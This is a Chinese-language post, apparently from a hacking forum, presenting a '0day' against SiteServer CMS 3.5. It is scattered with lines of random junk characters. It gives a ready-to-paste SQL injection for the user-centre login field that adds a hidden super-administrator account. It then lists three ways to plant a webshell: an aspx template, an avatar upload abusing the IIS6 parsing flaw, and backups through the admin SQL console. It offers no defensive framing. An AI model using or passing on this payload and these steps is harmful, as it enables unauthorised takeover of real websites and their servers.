SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
  k7 O5 u' `( X" H, m6 w
stieserver官网:www.siteserver.cn
6 _" L) t! @1 L# x9 ?
6 ^: a3 H8 }5 }+ _
) G9 ~. T6 W( F/ G1 c% i
! l; h* S. l9 K2 D$ REXP:

* E" }3 V6 Q0 V" ]5 U  C$ Q' T, m直接访问UserCenter/login.aspx


0 `1 Q+ }( K! s
用户名处输入：
% s, K% ]: Y" P3 d
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
: D$ i7 ?  v' e3 h0 V7 z- N

- J& z% \# O' K$ ~
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



3 I$ @# v/ h4 ?1 i/ z之后再访问后台SiteServer/login.aspx用插入的用户登陆


( {  E) r! P8 a" ^+ X7 V* G- O
后台拿webshell的三种方法：
) R" w4 a2 `8 C: n' c0 ?. f
- l6 I& ], A. I  \9 n4 K0 K一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

. c1 v5 ~5 f/ G( @6 h+ o6 t$ M& a二、
8 e- w. T5 B4 y8 _9 Y9 g0 W. W
* T( r& g+ X- a. f! Y; {成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/

! ?& W, k% F( Y' ]  `1 L) q3 P用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
4 M0 O* b; F. G) y! n9 A+ g
3 J: `2 W6 ]- v$ q5 ^（ps：后台添加用户时不会验证是否含有非法字符）
$ x9 U! P$ W8 I; N+ @; R9 f2 ?
三、
- ?9 b7 X. W1 I. @9 p
/ u7 o1 c8 I# G/ Q% ]5 R5 b系统工具-》实用工具-》机器参数查看
3 D4 V4 y5 J1 B; N# Y( R可以看到数据库类型、名称，WEB路径

3 f5 g+ H. L3 ]) Q+ r0 d' G系统工具-》数据库工具-》SQL语句查询
/ i( j9 ]" g  c5 ^+ _3 C这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
# g4 s* `8 k  W1 i3 e2 ?